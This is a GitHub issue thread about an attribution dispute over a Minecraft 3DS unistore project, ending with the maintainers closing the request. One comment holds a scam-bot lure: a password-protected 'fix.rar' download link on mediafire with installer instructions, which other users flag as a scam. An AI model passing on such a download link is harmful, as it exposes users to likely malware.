### ISSUE TITLE
Please properly credit me

### ISSUE THREAD

**Issue by ghost** [Minecraft-3DS-Community/Minecraft-3ds-unistore#2]
This is based off of my Unistore, I would like to see "This unistore is based off of susbaconhairman's" somewhere in the credits.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by susbaconhairman** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."
I just got this message a minute ago lol
But DO NOT DOWNLOAD IT, THIS IS A SCAM BOT

**Comment by nawrek** [comment]
This unistore is being built from scratch basically. The only things that are the same are icons and data structure, because it can't differ much between unistores. And I deleted the message with a scam link.

**Comment by ghost** [comment]
It is still based off of mine. I would like the credits to reflect that

**Comment by Cracko298** [comment]
No, it doesn't reflect yours apart from the way the credits look, which where rewrote from scratch.

**Comment by Cracko298** [comment]
closing Closing issue, as it's an invalid request.
